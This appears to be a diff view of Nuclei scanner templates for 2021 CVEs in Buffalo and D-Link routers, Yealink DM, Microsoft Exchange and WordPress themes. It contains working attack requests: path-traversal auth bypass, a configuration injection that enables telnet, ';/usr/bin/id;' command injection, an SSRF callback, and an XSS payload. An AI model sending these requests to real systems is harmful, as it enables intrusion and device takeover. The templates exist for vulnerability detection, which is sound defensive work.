||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2021-20090
|
||||
|
||||
info:
|
||||
name: Buffalo WSR-2533DHPL2 - Path Traversal
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
|
||||
- https://www.tenable.com/security/research/tra-2021-13
|
||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||
tags: cve,cve2021,lfi,buffalo,firmware,iot
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /images/..%2finfo.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}/info.html
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'URLToken(cgi_path)'
|
||||
- 'pppoe'
|
||||
- 'wan'
|
||||
condition: and
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-20091
|
||||
|
||||
info:
|
||||
name: Buffalo WSR-2533DHPL2 - Configuration File Injection
|
||||
author: gy741,pdteam,parth
|
||||
severity: critical
|
||||
description: |
|
||||
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
|
||||
- https://www.tenable.com/security/research/tra-2021-13
|
||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||
tags: cve,cve2021,buffalo,firmware,iot
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /images/..%2finfo.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{{{BaseURL}}}}/info.html
|
||||
|
||||
- |
|
||||
POST /images/..%2fapply_abstract.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}/info.html
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "/Success.htm"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: httoken
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'base64\,(.*?)" border='
|
|
@ -0,0 +1,55 @@
|
|||
id: CVE-2021-20092
|
||||
|
||||
info:
|
||||
name: Buffalo WSR-2533DHPL2 - Improper Access Control
|
||||
author: gy741,pdteam,parth
|
||||
severity: critical
|
||||
description: |
|
||||
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
|
||||
- https://www.tenable.com/security/research/tra-2021-13
|
||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||
tags: cve,cve2021,buffalo,firmware,iot
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /images/..%2finfo.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{{{BaseURL}}}}/info.html
|
||||
|
||||
- |
|
||||
GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: lang=8; url=ping.html; mobile=false;
|
||||
Referer: {{BaseURL}}/info.html
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 178
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-javascript"
|
||||
- type: word
|
||||
words:
|
||||
- "/*DEMO*/"
|
||||
- "addCfg("
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: httoken
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'base64\,(.*?)" border='
|
|
@ -7,7 +7,9 @@ info:
|
|||
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
|
||||
reference:
|
||||
- https://github.com/HoangKien1020/CVE-2021-21389
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389
|
||||
- https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
|
||||
- https://codex.buddypress.org/releases/version-7-2-1/
|
||||
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
|
||||
tags: cve,cve2021,wordpress,wp-plugin,rce
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-21816
|
||||
|
||||
info:
|
||||
name: D-LINK DIR-3040 - Syslog Information Disclosure
|
||||
description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
|
||||
author: gy741
|
||||
severity: medium
|
||||
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
|
||||
tags: cve,cve2021,dlink,exposure,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/messages"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "syslog:"
|
||||
- "admin"
|
||||
- "/etc_ro/lighttpd/www"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2021-24235
|
||||
|
||||
info:
|
||||
name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
|
||||
tags: cve,cve2021,wordpress,xss,wp-theme
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "input/Autofocus/%0D*/Onfocus=alert(123);"
|
||||
- "goto-tour-list-js-extra"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -5,7 +5,9 @@ info:
|
|||
author: daffainfo
|
||||
severity: medium
|
||||
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
|
||||
reference: |
|
||||
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
|
||||
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
|
||||
tags: cve,cve2021,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
tags: cve,cve2021,ssrf,rce,exchange
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob
|
||||
reference:
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
|
@ -18,19 +18,10 @@ requests:
|
|||
- |
|
||||
GET /owa/auth/x.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
- 503
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- 'X-Calculatedbetarget: somethingnonexistent'
|
||||
part: header
|
||||
- "http"
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-27561
|
||||
|
||||
info:
|
||||
name: YeaLink DM PreAuth RCE
|
||||
author: shifacyclewala,hackergautam
|
||||
severity: critical
|
||||
description: A malicious actor can trigger Unauthenticated Remote Code Execution
|
||||
tags: cve,cve2021,rce,yealink
|
||||
reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
part: body
|
||||
words:
|
||||
- 'uid'
|
||||
- 'gid'
|
||||
- 'groups'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "(u|g)id=.*"
|
|
@ -26,13 +26,14 @@ requests:
|
|||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue